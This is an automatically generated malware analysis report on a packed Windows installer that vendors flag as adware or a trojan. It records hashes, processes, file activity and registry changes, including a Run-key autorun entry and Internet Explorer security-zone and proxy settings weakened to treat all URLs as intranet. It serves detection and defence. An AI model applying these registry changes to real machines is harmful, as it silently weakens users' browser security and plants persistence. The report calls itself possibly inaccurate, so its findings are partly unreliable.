not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), Gen:Variant.Adware.Kazy.654480 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 3ef588817670bcddcd1b63156787d19a
SHA1: 82d2c394d590beb7c82c36857e41c0854f0636dc
SHA256: 4d203663a5dd102f5c13a89a30c0cfcf323b02bb13ffe137340a990928ca045a
SSDeep: 24576:kIS4xYCd7AA6g/SOfGA2yhw vJpKBYYbOI Yg1ICihTthfATEHDvJ:zS4xPAWqOfv2sjRpKBYDbYg1IjlbfzB
Size: 1071027 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Xacti, LLC
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsr8.tmp:592
Note-up.exe:380
nsz2.tmp:928
nsh30.tmp:644
nsc15.tmp:1864
regsvr32.exe:1924
%original file name%.exe:308
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsr8.tmp:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc15.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss13.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (0 bytes)
The process nsz2.tmp:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nswF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\heu39T.nss (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Note-UP_Setup[1].exe (143896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Application Data\NUIns\Uninstall.exe (1257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1E.tmp (15 bytes)
%Program Files%\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\vnsb2D.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp (15 bytes)
%Documents and Settings%\%current user%\Application Data\NUIns\NUIns.exe (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh30.tmp (143896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (115980 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nswF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\WmiInspector.dll (0 bytes)
%Program Files%\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\nsb2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (0 bytes)
The process nsh30.tmp:644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\InvokeShellVerb.dll (4 bytes)
%Program Files%\Note-up\Note-up.exe (136249 bytes)
%Program Files%\Note-up\uninstall.exe (1686 bytes)
%Documents and Settings%\%current user%\Desktop\Note-Up.lnk (1 bytes)
%Program Files%\Note-up\noteupshell0.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\ProcessKiller.dll (77 bytes)
%Program Files%\Note-up\Note-up.ico (2104 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\InvokeShellVerb.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\ProcessKiller.dll (0 bytes)
The process nsc15.tmp:1864 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso19.tmp (0 bytes)
The process %original file name%.exe:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (34013 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1.tmp (0 bytes)
Registry activity
The process nsr8.tmp:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 43 5E 4F 03 0B 11 FA B6 38 5E F2 71 B9 D6 D0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Note-up.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 BC F9 7E E4 5C BD 64 04 6B 61 19 15 56 FE A5"
The process nsz2.tmp:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"source" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\NUIns\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"DisplayName" = "Note-UP"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"pname" = "NU"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C9 E8 36 38 37 11 54 32 A8 E3 49 62 75 94 2F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"stats" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"Publisher" = "QUAHOG LIMITED"
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\NUIns\Uninstall.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsh30.tmp:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd33.tmp\ProcessKiller.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Note-up]
"DisplayName" = "Note-up"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E FA 9F 4A 62 32 88 C9 A7 63 78 95 83 08 83 B6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Note-up]
"DisplayIcon" = "%Program Files%\Note-up\Note-up.ico"
"Publisher" = "Note-up"
"UninstallString" = "%Program Files%\Note-up\uninstall.exe"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"DCGUID" = "{9C8F8BB7-4DB7-4D0C-8786-677B2AC39B58}"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Note-up" = "%Program Files%\Note-up\note-up.exe /watch"
The process nsc15.tmp:1864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 2D 29 6B 67 36 0C 76 A9 2E 92 6F 07 BC 7A C8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 7F 5E 9E 41 F1 C7 CB 65 5E A0 BB 68 3F AF 11"
[HKCR\*\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "15"
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
